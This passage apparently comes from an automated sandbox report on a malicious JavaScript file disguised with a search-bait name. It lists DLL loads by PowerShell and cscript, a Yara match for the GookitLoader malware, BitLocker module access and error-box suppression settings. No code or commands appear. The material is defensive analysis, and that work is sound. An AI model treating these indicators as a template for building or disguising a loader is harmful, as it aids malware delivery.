Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: samlib.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: is it legal to kill a peacock in california 93889.js Static file information: File size 30348243 > 1048576

Data Obfuscation
barindex
Yara detected GookitLoader
Source: Yara match File source: amsi64_6768.amsi.csv, type: OTHER
Source: Yara match File source: amsi64_5952.amsi.csv, type: OTHER
Source: Yara match File source: amsi64_1888.amsi.csv, type: OTHER
Source: Yara match File source: amsi64_5796.amsi.csv, type: OTHER

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
